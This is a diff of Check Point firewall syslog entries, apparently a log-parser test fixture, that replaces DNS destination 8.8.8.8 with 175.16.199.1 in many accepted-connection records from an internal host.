+<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43738"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44020"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59568"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56804"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40868"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58090"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51741"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"81.171.33.202"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39534"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51615"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48425"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x7,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35459"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51615"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48425"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x7,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35459"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"81.171.33.202"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33972"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d36e,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.196"]
-<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45724"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47374"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50265"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59575"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50747"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43931"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42662"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38182"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35224"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41291"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56079"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36181"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44038"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40103"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
